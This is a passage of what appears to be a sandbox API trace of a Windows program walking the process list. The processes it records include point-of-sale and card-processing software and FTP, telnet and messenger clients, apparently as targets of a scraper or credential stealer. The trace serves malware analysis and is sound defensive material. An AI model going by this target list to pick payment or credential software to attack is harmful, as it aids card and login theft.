dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0304.427] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0304.428] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0304.430] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0304.432] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0304.437] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0304.438] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0304.440] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0304.442] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0304.444] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0304.446] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0304.448] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0304.454] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0304.456] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0304.458] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0304.460] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0304.462] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0304.560] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0304.561] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0304.563] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0304.565] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0304.567] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0304.569] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0304.570] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0304.572] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0304.573] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0304.575] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0304.577] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0304.578] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0304.580] CloseHandle (hObject=0x1040) returned 1 [0304.580] Sleep (dwMilliseconds=0x64) [0304.700] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d4c [0305.002] Process32First (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0305.004] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0305.006] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0305.007] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0305.009] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0305.011] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0305.015] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0305.016] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0305.018] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0305.019] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.021] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.023] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0305.025] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.029] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.031] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.033] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.034] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.036] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.037] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.039] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0305.048] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0305.050] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0305.051] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.053] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x33, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0305.054] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0305.056] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0305.060] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0305.062] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0305.064] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.065] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0305.067] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0305.068] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0305.070] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0305.071] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0305.075] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0305.077] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0305.078] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0305.080] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0305.081] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0305.083] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0305.084] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0305.086] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0305.087] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0305.191] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0305.193] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0305.196] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0305.199] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0305.204] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0305.206] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0305.208] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0305.210] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0305.212] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0305.214] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0305.218] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0305.220] Process32Next (in: hSnapshot=0x1d4c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0305.222] 